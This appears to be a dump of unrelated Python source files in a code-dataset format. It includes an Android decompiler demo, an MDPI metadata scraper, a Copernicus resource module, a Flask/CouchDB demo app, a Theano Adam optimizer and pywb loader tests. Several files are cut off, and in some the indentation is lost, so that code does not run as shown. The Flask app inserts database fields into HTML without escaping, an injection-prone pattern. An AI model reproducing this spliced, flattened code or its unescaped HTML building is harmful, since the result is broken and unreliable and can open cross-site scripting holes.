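#     machine = DvMachine('classes.dex')
#     machine.process()
#     machine.show_source()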
logger = logging.getLogger('dad')
sys.setrecursionlimit(5000)
def main():
    # Set logger.setLevel(logging.DEBUG) below for debugging output,
    # or comment the line out to quiet the logging.
logger.setLevel(logging.INFO)
console_hdlr = logging.StreamHandler(sys.stdout)
console_hdlr.setFormatter(logging.Formatter('%(levelname)s: %(message)s'))
logger.addHandler(console_hdlr)
default_file = 'examples/android/TestsAndroguard/bin/TestActivity.apk'
if len(sys.argv) > 1:
machine = DvMachine(sys.argv[1])
else:
machine = DvMachine(default_file)
logger.info('========================')
logger.info('Classes:')
for class_name in sorted(machine.get_classes()):
logger.info(' %s', class_name)
logger.info('========================')
cls_name = raw_input('Choose a class: ')
if cls_name == '*':
machine.process_and_show()
else:
cls = machine.get_class(cls_name.decode('utf8'))
if cls is None:
logger.error('%s not found.', cls_name)
else:
logger.info('======================')
for method_id, method in cls.get_methods().items():
logger.info('%d: %s', method_id, method.name)
logger.info('======================')
meth = raw_input('Method: ')
if meth == '*':
logger.info('CLASS = %s', cls)
cls.process()
else:
cls.process_method(int(meth))
logger.info('Source:')
logger.info('===========================')
cls.show_source()
if __name__ == '__main__':
main()
| apache-2.0 | -8,862,995,910,666,431,000 | 34.851124 | 79 | 0.5599 | false | 3.997181 | false | false | false |
OAButton/tricorder | plugins/python/mdpi.py | 2 | 3568 | #!/usr/bin/env python2.6
import os, sys, re, urllib2, cookielib, string
from urllib import urlencode
from urllib2 import urlopen
from copy import copy
import BeautifulSoup
import htmlentitydefs
import html5lib
from html5lib import treebuilders
import warnings
import codecs
warnings.simplefilter("ignore",DeprecationWarning)
import socket
socket.setdefaulttimeout(15)
class ParseException(Exception):
pass
##
# Removes HTML or XML character references and entities from a text string.
#
# @param text The HTML (or XML) source text.
# @return The plain text, as a Unicode string, if necessary.
def unescape(text):
def fixup(m):
text = m.group(0)
if text[:2] == "&#":
# character reference
try:
if text[:3] == "&#x":
return unichr(int(text[3:-1], 16))
else:
return unichr(int(text[2:-1]))
except ValueError:
pass
else:
# named entity
try:
text = unichr(htmlentitydefs.name2codepoint[text[1:-1]])
except KeyError:
pass
return text # leave as is
#return re.sub("&#?\w+;", fixup, text).encode('utf-8')
return re.sub("&#?\w+;", fixup, text)
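# Example (illustrative): unescape('AT&amp;T &#169; 2010') -> u'AT&T \xa9 2010'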
def meta(soup, key):
el = soup.find("meta", {'name':key})
if el:
return el['content'];
return None
def item(soup, entry, key):
el = meta(soup, key)
if el:
print "%s\t%s" % (entry, el)
def handle(url):
# http://www.mdpi.com/2072-4292/1/4/1139
m = re.match(r'http://www\.mdpi\.com/(\d{4}-\d{4}/\d+/\d+/\d+)', url)
if not m:
raise ParseException, "URL not supported %s" % url
wkey = m.group(1)
#u = codecs.getreader('utf-8')(urlopen(url))
#page = u.read()
page = urlopen(url).read()
parser = html5lib.HTMLParser(tree=treebuilders.getTreeBuilder("beautifulsoup"))
soup = parser.parse(page)
head = soup.find("head")
doi = meta(head, 'dc.identifier')
if not doi:
raise ParseException, "Cannot find DOI"
m = re.match(r'(?:doi:)?(.*)$', doi)
if not m:
raise ParseException, "Cannot find DOI"
doi = m.group(1)
print "begin_tsv"
print "linkout\tDOI\t\t%s\t\t" % (doi)
print "linkout\tMDPI\t\t%s\t\t" % wkey
print "type\tJOUR"
title = meta(head, "dc.title")
#if title:
# print "title\t%s" % unescape(title)
if title:
print "title\t%s" % title
item(head, "journal", "prism.publicationName")
item(head, "volume", "prism.volume")
item(head, "issue", "prism.number")
item(head, "start_page", "prism.startingPage")
item(head, "end_page", "prism.endingPage")
item(head, "issn", "prism.issn")
item(head, "abstract", "dc.description")
date = meta(head, 'dc.date')
if date:
m = re.match(r'(\d+)-(\d+)-(\d+)', date)
if m:
year = m.group(1)
month = m.group(2)
day = m.group(3)
if year:
print "year\t%s" % year
if month:
print "month\t%s" % month
if day:
print "day\t%s" % day
# authors
authors = head.findAll("meta", {"name":"dc.creator"})
if authors:
for a in authors:
print "author\t%s" % a['content']
print "doi\t%s" % doi
print "end_tsv"
print "status\tok"
# read url from std input
url = sys.stdin.readline()
# get rid of the newline at the end
url = url.strip()
sys.stdout = codecs.getwriter('utf-8')(sys.stdout)
try:
handle(url)
except Exception, e:
import traceback
line = traceback.tb_lineno(sys.exc_info()[2])
print "\t".join(["status", "error", "There was an internal error processing this request. Please report this to bugs@citeulike.org quoting error code %d." % line])
raise
| bsd-3-clause | 8,792,032,125,478,959,000 | 23.108108 | 164 | 0.622478 | false | 2.905537 | false | false | false |
soellman/copernicus | cpc/dataflow/resource.py | 2 | 4264 | # This file is part of Copernicus
# http://www.copernicus-computing.org/
#
# Copyright (C) 2011, Sander Pronk, Iman Pouya, Erik Lindahl, and others.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as published
# by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import logging
import json
log=logging.getLogger(__name__)
import cpc.util
import run
import cpc.command
class ResourceList:
"""A list of resources."""
def __init__(self):
self.rsrc=dict()
def set(self, name, value):
"""Set a specific value."""
self.rsrc[name]=value
def get(self, name):
"""Get a value with a specific name."""
return self.rsrc.get(name)
def getValue(self):
"""Return a Value object with all settings."""
retDict=dict()
for name, item in self.rsrc.iteritems():
retDict[name] = run.IntValue(item)
return run.DictValue(retDict)
def iteritems(self):
return self.rsrc.iteritems()
def empty(self):
return len(self.rsrc) == 0
class Resources:
"""Class describing minimum, maximum, and optimal command resources.
For use in functions that have min/max/optimal resources."""
def __init__(self, inputValue=None):
self.min=ResourceList()
self.max=ResourceList()
self.workers=dict()
if inputValue is not None:
self.getInputValue(inputValue)
def getInputValue(self, inputValue):
# read in min values
for name, item in inputValue.value["min"].value.iteritems():
self.min.set(name, int(item.value))
# read in max values
for name, item in inputValue.value["max"].value.iteritems():
self.max.set(name, int(item.value))
# read worker items
for workerName, worker in inputValue.value["workers"].value.iteritems():
if workerName not in self.workers:
self.workers[workerName]=ResourceList()
            for name, item in worker.value.iteritems():
                self.workers[workerName].set(name, int(item.value))
def setOutputValue(self):
"""Create a Value object based on the settings in this object."""
workerDict=dict()
        for workerName, item in self.workers.iteritems():
workerDict[workerName] = item.getValue()
return run.RecordValue( { "min": self.min.getValue(),
"max": self.max.getValue(),
"workers": run.DictValue(workerDict) } )
def updateCmd(self, cmd):
"""Set the command's resources from an input value."""
for name, item in self.min.iteritems():
cmd.addMinRequired(cpc.command.Resource(name, item))
for name, item in self.max.iteritems():
cmd.addMaxAllowed(cpc.command.Resource(name, item))
def save(self,filename):
svf=dict()
svf['min']=self.min.rsrc
svf['max']=self.max.rsrc
wrkrs=dict()
for name, w in self.workers.iteritems():
wrkrs[name] = w.rsrc
svf['workers']=wrkrs
fout=open(filename, 'w')
fout.write(json.dumps(svf))
fout.write('\n')
fout.close()
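    # The JSON written by save() has this illustrative layout (resource names
    # such as "cores" are hypothetical):
    #   {"min": {"cores": 1}, "max": {"cores": 8},
    #    "workers": {"worker0": {"cores": 4}}}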
def load(self, filename):
fin=open(filename, 'r')
svf=json.loads(fin.read())
fin.close()
for name, value in svf['min'].iteritems():
self.min.set(name, int(value))
for name, value in svf['max'].iteritems():
self.max.set(name, int(value))
for name, w in svf['workers'].iteritems():
if name not in self.workers:
self.workers[name] = ResourceList()
            for itemname, value in w.iteritems():
self.workers[name].set(itemname, int(value))
| gpl-2.0 | -8,518,917,515,898,427,000 | 33.112 | 80 | 0.615385 | false | 3.94085 | false | false | false |
LennartFr/Hackathons | FlaskCloudant/welcome.py | 1 | 3515 | # Copyright 2015 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from flask import Flask, jsonify
import json
import requests
from flask import Flask, render_template, request, url_for
import couchdb, couchdb.mapping
from couchdb import Database,Server, Session
from couchdb.mapping import Document, TextField, IntegerField, DateTimeField
from datetime import datetime
import platform
from mymethods import selectdb
app = Flask(__name__)
@app.route('/')
def Welcome():
print ("Welcome.py")
return app.send_static_file('index.html')
@app.route('/listdbs', methods = ['POST', 'GET'])
def listdbs():
srv = request.form['srv']
couch=selectdb(srv)
    databases = "<h1>Databases</h1><hr>"
server = couch
for db in server:
print (db)
databases=databases+" "+ db +"<br>"
return databases
#---------------------------------------------------
#@app.route('/api/createdbdlg')
def createdbdlg():
print ("Createdbdlg")
return app.send_static_file('index.html')
#----------------------------------------------------
@app.route('/createdb', methods = ['POST', 'GET'])
def createdb():
db = request.form['db']
srv = request.form['srv']
print ("Database "+ db)
couch=selectdb(srv)
print ("Creating database "+ db)
rc = couch.create(db)
return "created database "+ db
#---------------------------------------------------
@app.route('/dbinsert', methods=['GET','POST'])
def dbinsert():
srv = request.form['srv']
database = request.form['database']
id = request.form['id']
name = request.form['name']
age = request.form['age']
health = request.form['health']
couch=selectdb(srv)
db = couch[database]
doc = ({'name': name,'age':age,'health': health})
db.save(doc)
    return "we got here " + srv + " database " + database + " name: " + name + " age " + age + " health: " + health
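# Illustrative request against this route (a sketch; the port and the 'srv'
# value understood by selectdb are assumptions):
#
#   curl -X POST http://localhost:5000/dbinsert \
#        -d "srv=local&database=mydb&id=1&name=Ann&age=30&health=good"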
#------------------------------------
@app.route('/classprint', methods = ['POST'])
def classprint():
srv = request.form['srv']
db = request.form['db']
print ("Classprint DB : "+ db)
couch=selectdb(srv)
db = couch[db]
record = "<h1>Records</h1><table><hr>"
for id in db:
#print (id)
doc = db[id]
rid = doc['_id']
name = doc['name']
age = doc['age']
health = doc['health']
rec = "<tr><td>Id: "+rid+"<td>Name: <td>"+name + "<td> Age: "+str(age)+"<td> Health: "+health+"</tr>"
record=record+rec
record=record+"</table>"
print ("Classprint")
return record
@app.route('/jinja2')
def jinja2():
print ("Jinja2")
return render_template('template.html', my_string="Wheeeee!", my_list=['database1','database2','database3'])
#------------------------------------------------
port = os.getenv('PORT', '5000')
print ("Welcome.py")
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(port))
| apache-2.0 | -1,425,923,854,102,895,400 | 29.042735 | 114 | 0.579232 | false | 3.642487 | false | false | false |
unicefuganda/edtrac | edtrac_project/settings/schedule.py | 1 | 6645 | import datetime
from datetime import date
#All term-scheduled polls are computed based on these dates.
#These dates are necessary for the system to work properly and
#should be entered at the beginning of every year. See _next_term_question_date()
FIRST_TERM_BEGINS = datetime.datetime(2014, 2, 3)
SECOND_TERM_BEGINS = datetime.datetime(2014, 5, 19)
THIRD_TERM_BEGINS = datetime.datetime(2014, 9, 8)
# Current term start and end dates
SCHOOL_TERM_START = FIRST_TERM_BEGINS
SCHOOL_TERM_END = datetime.datetime(2014, 4, 25)
SCHOOL_HOLIDAYS=[
# (start_of_holiday_datetime, end_of_holidate_datetime),
# (start_of_holiday2_datetime...),
# (,),
# ...
#start of year holiday season
(datetime.datetime(2014, 1, 1), datetime.datetime(2014, 2, 2)),
#public holidays
(datetime.datetime(2014, 1, 26), '1d'), #Liberation day
(datetime.datetime(2014, 3, 8), '1d'), #Women's day
(datetime.datetime(2014, 4, 18), datetime.datetime(2014, 4, 21)), #Easter holiday
(datetime.datetime(2014, 5, 1), '1d'), #Labour day
(datetime.datetime(2014, 6, 3), '1d'), #Uganda Martyrs' Day
(datetime.datetime(2014, 6, 9), '1d'), #Heroes' day
(datetime.datetime(2014, 10, 9), '1d'), #Independence Day
(datetime.datetime(2014, 12, 6), datetime.datetime(2014, 12, 31)), #Xmas holiday
#TBD
(datetime.datetime(2014, 8, 8), '1d'), #Idd El Fitri
(datetime.datetime(2014, 10, 15), '1d'), #Idd Adhua
]
WEEKLY = [
# Term one
date(2014, 2, 14), # First poll delayed by a day.
date(2014, 2, 20),
date(2014, 2, 27),
date(2014, 3, 6),
date(2014, 3, 13),
date(2014, 3, 20),
date(2014, 3, 27),
date(2014, 4, 3),
date(2014, 4, 10),
date(2014, 4, 17),
date(2014, 4, 24),
# Term two
date(2014, 5, 22),
date(2014, 5, 29),
date(2014, 6, 5),
date(2014, 6, 12),
date(2014, 6, 19),
date(2014, 6, 26),
date(2014, 7, 3),
date(2014, 7, 10),
date(2014, 7, 17),
date(2014, 7, 24),
date(2014, 7, 31),
date(2014, 8, 7),
# Term three
date(2014, 9, 11),
date(2014, 9, 18),
date(2014, 9, 25),
date(2014, 10, 2),
#date(2014, 10, 9), Independence Day
date(2014, 10, 10),
date(2014, 10, 16),
date(2014, 10, 23),
date(2014, 10, 30),
date(2014, 11, 6),
date(2014, 11, 13),
date(2014, 11, 20),
date(2014, 11, 27),
date(2014, 12, 4),
]
VIOLENCE = [
# Term one
date(2014, 2, 24),
date(2014, 3, 24),
date(2014, 4, 22),
# Term two
date(2014, 5, 26),
date(2014, 6, 23),
date(2014, 7, 28),
# Term three
date(2014, 9, 29),
date(2014, 10, 27),
date(2014, 11, 24),
]
HEAD_MEALS = [
# Term one
date(2014, 2, 21),
date(2014, 3, 28),
date(2014, 4, 25),
# Term two
date(2014, 5, 23),
date(2014, 6, 27),
date(2014, 7, 25),
# Term three
date(2014, 9, 26),
date(2014, 10, 24),
date(2014, 11, 28),
]
SMC_MEALS = [
# Term one
date(2014, 2, 24),
date(2014, 3, 24),
date(2014, 4, 22),
# Term two
date(2014, 5, 26),
date(2014, 6, 23),
date(2014, 7, 28),
# Term three
date(2014, 9, 29),
date(2014, 10, 27),
date(2014, 11, 24),
]
GEM = [
# Term one
date(2014, 2, 21),
date(2014, 3, 28),
date(2014, 4, 25),
# Term two
date(2014, 5, 23),
date(2014, 6, 27),
date(2014, 7, 25),
# Term three
date(2014, 9, 26),
date(2014, 10, 24),
date(2014, 11, 28),
]
TEACHER_DEPLOYMENT = [
date(2014, 2, 21),
date(2014, 6, 6),
date(2014, 10, 3),
]
P6_ENROLLMENT = [
date(2014, 2, 26),
date(2014, 5, 28),
date(2014, 9, 17),
]
P3_ENROLLMENT = [
date(2014, 2, 28),
date(2014, 5, 30),
date(2014, 9, 19),
]
ENROLLMENT = [
date(2014, 3, 4),
date(2014, 6, 11),
date(2014, 10, 7),
]
UPE_GRANT = [
date(2014, 3, 5),
date(2014, 6, 25),
date(2014, 10, 8),
]
SMC_MONITORING = [
date(2014, 4, 23),
date(2014, 8, 1),
date(2014, 11, 26),
]
MONITORING = [
date(2014, 4, 23),
date(2014, 8, 1),
date(2014, 11, 26),
]
WATER_SOURCE = [
date(2014, 3, 19),
date(2014, 6, 17),
date(2014, 10, 13),
]
FUNCTIONAL_WATER_SOURCE = [
date(2014, 3, 21),
date(2014, 6, 18),
date(2014, 10, 14),
]
POLL_DATES = {
'edtrac_head_teachers_weekly': WEEKLY,
'edtrac_upe_grant_headteacher_termly': UPE_GRANT,
'edtrac_teacher_deployment_headteacher_termly': TEACHER_DEPLOYMENT,
'edtrac_script_water_source': WATER_SOURCE,
'edtrac_script_functional_water_source': FUNCTIONAL_WATER_SOURCE,
'edtrac_p6_enrollment_headteacher_termly': P6_ENROLLMENT,
'edtrac_headteacher_violence_monthly': VIOLENCE,
'edtrac_head_teachers_monthly': TEACHER_DEPLOYMENT,
'edtrac_p3_enrollment_headteacher_termly': P3_ENROLLMENT,
'edtrac_headteacher_meals_monthly': HEAD_MEALS,
'edtrac_head_teachers_midterm': MONITORING,
'edtrac_school_enrollment_termly': ENROLLMENT,
'edtrac_smc_weekly': WEEKLY,
'edtrac_smc_termly': SMC_MONITORING,
'edtrac_smc_monthly': SMC_MEALS,
'edtrac_p3_teachers_weekly': WEEKLY,
'edtrac_p6_teachers_weekly': WEEKLY,
'edtrac_gem_monthly': GEM,
}
GROUPS = {'Teachers' : [],
'Head Teachers' : ['edtrac_head_teachers_weekly',
'edtrac_upe_grant_headteacher_termly',
'edtrac_teacher_deployment_headteacher_termly',
'edtrac_script_water_source',
'edtrac_script_functional_water_source',
'edtrac_p6_enrollment_headteacher_termly',
'edtrac_headteacher_violence_monthly',
'edtrac_head_teachers_monthly',
'edtrac_p3_enrollment_headteacher_termly',
'edtrac_school_enrollment_termly',
'edtrac_head_teachers_midterm',
'edtrac_headteacher_meals_monthly'],
'SMC' : ['edtrac_smc_weekly',
'edtrac_smc_termly',
'edtrac_smc_monthly'],
'GEM': ['edtrac_gem_monthly'],
'p3' : ['edtrac_p3_teachers_weekly'],
'p6' : ['edtrac_p6_teachers_weekly']}
| bsd-3-clause | -8,855,191,989,186,216,000 | 25.794355 | 85 | 0.53228 | false | 2.908096 | false | false | false |
mtanti/where-image | experiments/where_image/architecture/optimizers.py | 1 | 3775 | from __future__ import absolute_import, division, print_function, unicode_literals
from builtins import ascii, bytes, chr, dict, filter, hex, input, int, map, next, oct, open, pow, range, round, str, super, zip
import theano
import theano.tensor as T
import math
import numpy as np
from architecture.layer import *
floatX = theano.config.floatX
##################################################################################################################################
class Optimizer(object):
#################################################################
def __init__(self):
pass
#################################################################
def compile(self, params, grads):
raise NotImplementedError()
#################################################################
def init(self):
raise NotImplementedError()
#################################################################
def next_update_list(self):
raise NotImplementedError()
##################################################################################################################################
class Adam(Optimizer):
#################################################################
def __init__(self, gradient_clipping_magnitude=None, learning_rate=0.001, epsilon=1e-8, beta1=0.9, beta2=0.999):
super(Adam, self).__init__()
self.gradient_clipping_magnitude = gradient_clipping_magnitude
self.learning_rate = learning_rate
self.epsilon = epsilon
self.beta1 = beta1
self.beta2 = beta2
self.params = None
self.grads = None
self.ms = None
self.vs = None
self.t = None
#################################################################
def compile(self, params, grads):
self.params = params
if self.gradient_clipping_magnitude is None:
self.grads = grads
else:
self.grads = [ T.clip(g, -self.gradient_clipping_magnitude, self.gradient_clipping_magnitude) for g in grads ]
self.ms = [ theano.shared(np.zeros_like(p.get_value(), dtype=floatX)) for p in self.params ]
self.vs = [ theano.shared(np.zeros_like(p.get_value(), dtype=floatX)) for p in self.params ]
self.t = theano.shared(np.array(0, dtype='int64'))
self.init()
#################################################################
def init(self):
for m in self.ms:
m.set_value(np.zeros_like(m.get_value(), dtype=floatX))
for v in self.vs:
v.set_value(np.zeros_like(v.get_value(), dtype=floatX))
self.t.set_value(np.array(1, dtype='int64'))
#################################################################
def next_update_list(self):
if self.params is None:
raise ValueError('Optimizer has not been compiled yet.')
new_ms = [ self.beta1*m + (1 - self.beta1)*g for (m,g) in zip(self.ms, self.grads) ]
new_vs = [ self.beta2*v + (1 - self.beta2)*T.sqr(g) for (v,g) in zip(self.vs, self.grads) ]
ms_hat = [ m/T.cast(1 - T.pow(self.beta1, self.t), floatX) for m in new_ms ]
vs_hat = [ v/T.cast(1 - T.pow(self.beta2, self.t), floatX) for v in new_vs ]
return (
[ (m, new_m) for (m,new_m) in zip(self.ms, new_ms) ] +
[ (v, new_v) for (v,new_v) in zip(self.vs, new_vs) ] +
[ (self.t, self.t + 1) ] +
[ (p, p - self.learning_rate*m_hat/(T.sqrt(v_hat) + self.epsilon)) for (p,m_hat,v_hat) in zip(self.params, ms_hat, vs_hat) ]
)
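# Illustrative wiring (a sketch; `params`, `cost` and `inputs` are assumed to
# be a list of shared variables, a scalar expression and the function inputs):
#
#     opt = Adam(learning_rate=0.001)
#     opt.compile(params, T.grad(cost, params))
#     train = theano.function(inputs, cost, updates=opt.next_update_list())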
| mit | -4,613,927,694,636,940,000 | 41.390805 | 140 | 0.441589 | false | 4.148352 | false | false | false |
jcushman/pywb | pywb/utils/test/test_loaders.py | 2 | 4867 | #=================================================================
r"""
# LimitReader Tests
>>> LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 10).read(26)
'abcdefghji'
>>> LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 8).readline(26)
'abcdefgh'
>>> LimitReader.wrap_stream(LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 8), 4).readline(26)
'abcd'
>>> read_multiple(LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 10), [2, 2, 20])
'efghji'
# zero-length read
>>> LimitReader(BytesIO('a'), 0).readline(0)
''
# don't wrap if invalid length
>>> b = BytesIO('b')
>>> LimitReader.wrap_stream(b, 'abc') == b
True
# BlockLoader Tests (includes LimitReader)
# Ensure attempt to read more than 100 bytes, reads exactly 100 bytes
>>> len(BlockLoader().load(test_cdx_dir + 'iana.cdx', 0, 100).read('400'))
100
# no length specified, read full amount requested
>>> len(BlockLoader().load(to_file_url(test_cdx_dir + 'example.cdx'), 0, -1).read(400))
400
# no such file
>>> len(BlockLoader().load('_x_no_such_file_', 0, 100).read('400'))
Traceback (most recent call last):
IOError: [Errno 2] No such file or directory: '_x_no_such_file_'
# HMAC Cookie Maker
>>> BlockLoader(HMACCookieMaker('test', 'test', 5)).load('http://example.com', 41, 14).read()
'Example Domain'
# fixed cookie, range request
>>> BlockLoader('some=value').load('http://example.com', 41, 14).read()
'Example Domain'
# range request
>>> BlockLoader().load('http://example.com', 1262).read()
'</html>\n'
# test with extra id, ensure 4 parts of the A-B=C-D form are present
>>> len(re.split('[-=]', HMACCookieMaker('test', 'test', 5).make('extra')))
4
# cookie extract tests
>>> extract_client_cookie(dict(HTTP_COOKIE='a=b; c=d'), 'a')
'b'
>>> extract_client_cookie(dict(HTTP_COOKIE='a=b; c=d'), 'c')
'd'
>>> extract_client_cookie(dict(HTTP_COOKIE='a=b; c=d'), 'x')
>>> extract_client_cookie(dict(HTTP_COOKIE='x'), 'x')
>>> extract_client_cookie({}, 'y')
# append_post_query
>>> append_post_query('http://example.com/?abc=def', 'foo=bar')
'http://example.com/?abc=def&foo=bar'
>>> append_post_query('http://example.com/', '')
'http://example.com/'
>>> append_post_query('http://example.com/', 'foo=bar')
'http://example.com/?foo=bar'
# extract_post_query tests
# correct POST data
>>> post_data = 'foo=bar&dir=%2Fbaz'
>>> extract_post_query('POST', 'application/x-www-form-urlencoded', len(post_data), BytesIO(post_data))
'foo=bar&dir=/baz'
# unsupported method
>>> extract_post_query('PUT', 'application/x-www-form-urlencoded', len(post_data), BytesIO(post_data))
# unsupported type
>>> extract_post_query('POST', 'text/plain', len(post_data), BytesIO(post_data))
# invalid length
>>> extract_post_query('POST', 'application/x-www-form-urlencoded', 'abc', BytesIO(post_data))
>>> extract_post_query('POST', 'application/x-www-form-urlencoded', 0, BytesIO(post_data))
# length too short
>>> extract_post_query('POST', 'application/x-www-form-urlencoded', len(post_data) - 4, BytesIO(post_data))
'foo=bar&dir=%2'
# length too long
>>> extract_post_query('POST', 'application/x-www-form-urlencoded', len(post_data) + 4, BytesIO(post_data))
'foo=bar&dir=/baz'
# test read_last_line
>>> read_last_line(BytesIO('A\nB\nC'))
'C'
>>> read_last_line(BytesIO('Some Line\nLonger Line\nLongest Last Line LL'), offset=8)
'Longest Last Line LL'
>>> read_last_line(BytesIO('A\nBC'))
'BC'
>>> read_last_line(BytesIO('A\nBC\n'))
'BC\n'
>>> read_last_line(BytesIO('ABC'))
'ABC'
"""
#=================================================================
import re
import os
import pytest
from io import BytesIO
from pywb.utils.loaders import BlockLoader, HMACCookieMaker, to_file_url
from pywb.utils.loaders import LimitReader, extract_client_cookie, extract_post_query
from pywb.utils.loaders import append_post_query, read_last_line
from pywb.utils.bufferedreaders import DecompressingBufferedReader
from pywb import get_test_dir
test_cdx_dir = get_test_dir() + 'cdx/'
def read_multiple(reader, inc_reads):
result = None
for x in inc_reads:
result = reader.read(x)
return result
def seek_read_full(seekable_reader, offset):
seekable_reader.seek(offset)
seekable_reader.readline() #skip
return seekable_reader.readline()
def test_s3_read_1():
pytest.importorskip('boto')
res = BlockLoader().load('s3://aws-publicdatasets/common-crawl/crawl-data/CC-MAIN-2015-11/segments/1424936462700.28/warc/CC-MAIN-20150226074102-00159-ip-10-28-5-156.ec2.internal.warc.gz',
offset=53235662,
length=2526)
buff = res.read()
assert len(buff) == 2526
reader = DecompressingBufferedReader(BytesIO(buff))
assert reader.readline() == 'WARC/1.0\r\n'
assert reader.readline() == 'WARC-Type: response\r\n'
if __name__ == "__main__":
import doctest
doctest.testmod()
| gpl-3.0 | 7,037,224,367,784,346,000 | 27.629412 | 191 | 0.66016 | false | 3.041875 | true | false | false |
tinkerinestudio/Tinkerine-Suite | TinkerineSuite/python/Lib/OpenGL/GL/ARB/uniform_buffer_object.py | 4 | 5168 | '''OpenGL extension ARB.uniform_buffer_object
This module customises the behaviour of the
OpenGL.raw.GL.ARB.uniform_buffer_object to provide a more
Python-friendly API
Overview (from the spec)
This extension introduces the concept of a group of GLSL uniforms
known as a "uniform block", and the API mechanisms to store "uniform
blocks" in GL buffer objects.
The extension also defines both a standard cross-platform layout in
memory for uniform block data, as well as mechanisms to allow the GL
to optimize the data layout in an implementation-defined manner.
Prior to this extension, the existing interface for modification of
uniform values allowed modification of large numbers of values using
glUniform* calls, but only for a single uniform name (or a uniform
array) at a time. However, updating uniforms in this manner may not
map well to heterogenous uniform data structures defined for a GL
application and in these cases, the application is forced to either:
A) restructure their uniform data definitions into arrays
or
B) make an excessive number of calls through the GL interface
to one of the Uniform* variants.
These solutions have their disadvantages. Solution A imposes
considerable development overhead on the application developer.
Solution B may impose considerable run-time overhead on the
application if the number of uniforms modified in a given frame of
rendering is sufficiently large.
This extension provides a better alternative to either (A) or (B) by
allowing buffer object backing for the storage associated with all
uniforms of a given GLSL program.
Storing uniform blocks in buffer objects enables several key use
cases:
- sharing of uniform data storage between program objects and
between program stages
- rapid swapping of sets of previously defined uniforms by storing
sets of uniform data on the GL server
- rapid updates of uniform data from both the client and the server
The data storage for a uniform block can be declared to use one of
three layouts in memory: packed, shared, or std140.
- "packed" uniform blocks have an implementation-dependent data
layout for efficiency, and unused uniforms may be eliminated by
the compiler to save space.
- "shared" uniform blocks, the default layout, have an implementation-
dependent data layout for efficiency, but the layout will be uniquely
determined by the structure of the block, allowing data storage to be
shared across programs.
- "std140" uniform blocks have a standard cross-platform cross-vendor
layout (see below). Unused uniforms will not be eliminated.
Any uniforms not declared in a named uniform block are said to
be part of the "default uniform block".
While uniforms in the default uniform block are updated with
glUniform* entry points and can have static initializers, uniforms
in named uniform blocks are not. Instead, uniform block data is updated
using the routines that update buffer objects and can not use static
initializers.
Rules and Concepts Guiding this Specification:
For reference, a uniform has a "uniform index" (subsequently
referred to as "u_index) and also a "uniform location" to
efficiently identify it in the uniform data store of the
implementation. We subsequently refer to this uniform data store of
the implementation as the "uniform database".
A "uniform block" only has a "uniform block index" used for queries
and connecting the "uniform block" to a buffer object. A "uniform
block" has no "location" because "uniform blocks" are not updated
directly. The buffer object APIs are used instead.
Properties of Uniforms and uniform blocks:
a) A uniform is "active" if it exists in the database and has a valid
u_index.
b) A "uniform block" is "active" if it exists in the database and
has a valid ub_index.
c) Uniforms and "uniform blocks" can be inactive because they don't
exist in the source, or because they have been removed by dead
code elimination.
d) An inactive uniform has u_index == INVALID_INDEX.
e) An inactive uniform block has ub_index == INVALID_INDEX.
f) A u_index or ub_index of INVALID_INDEX generates the
INVALID_VALUE error if given as a function argument.
g) The default uniform block, which is not assigned any ub_index, uses a
private, internal data storage, and does not have any buffer object
associated with it.
h) An active uniform that is a member of the default uniform block has
location >= 0 and it has offset == stride == -1.
i) An active uniform that is a member of a named uniform block has
location == -1.
j) A uniform location of -1 is silently ignored if given as a function
argument.
k) Uniform block declarations may not be nested
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/uniform_buffer_object.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.ARB.uniform_buffer_object import *
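# Illustrative sketch (not part of the autogenerated bindings): bind a uniform
# block named "Matrices" to binding point 0, assuming `program` is a linked
# program object and `ubo` an existing buffer object:
#
#     idx = glGetUniformBlockIndex(program, b"Matrices")
#     glUniformBlockBinding(program, idx, 0)
#     glBindBufferBase(GL_UNIFORM_BUFFER, 0, ubo)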
### END AUTOGENERATED SECTION | agpl-3.0 | 973,823,161,348,524,300 | 42.436975 | 74 | 0.766834 | false | 4.201626 | false | false | false |
anaruse/chainer | tests/chainer_tests/distributions_tests/test_normal.py | 1 | 1214 | from chainer import distributions
from chainer import testing
import numpy
@testing.parameterize(*testing.product({
'shape': [(3, 2), (1,)],
'is_variable': [True, False],
'sample_shape': [(3, 2), ()],
}))
@testing.fix_random()
@testing.with_requires('scipy')
class TestNormal(testing.distribution_unittest):
scipy_onebyone = True
def setUp_configure(self):
from scipy import stats
self.dist = distributions.Normal
self.scipy_dist = stats.norm
self.test_targets = set([
"batch_shape", "cdf", "entropy", "event_shape", "icdf", "log_cdf",
"log_prob", "log_survival", "mean", "prob", "sample", "stddev",
"support", "survival", "variance"])
loc = numpy.random.uniform(-1, 1, self.shape).astype(numpy.float32)
scale = numpy.exp(
numpy.random.uniform(-1, 1, self.shape)).astype(numpy.float32)
self.params = {"loc": loc, "scale": scale}
self.scipy_params = {"loc": loc, "scale": scale}
def sample_for_test(self):
smp = numpy.random.normal(
size=self.sample_shape + self.shape).astype(numpy.float32)
return smp
testing.run_module(__name__, __file__)
| mit | -3,783,134,970,045,142,500 | 30.128205 | 78 | 0.602965 | false | 3.508671 | true | false | false |
Carreau/Love | love/github.py | 1 | 2421 | import github
import getpass
import json
import keyring
import subprocess
import requests
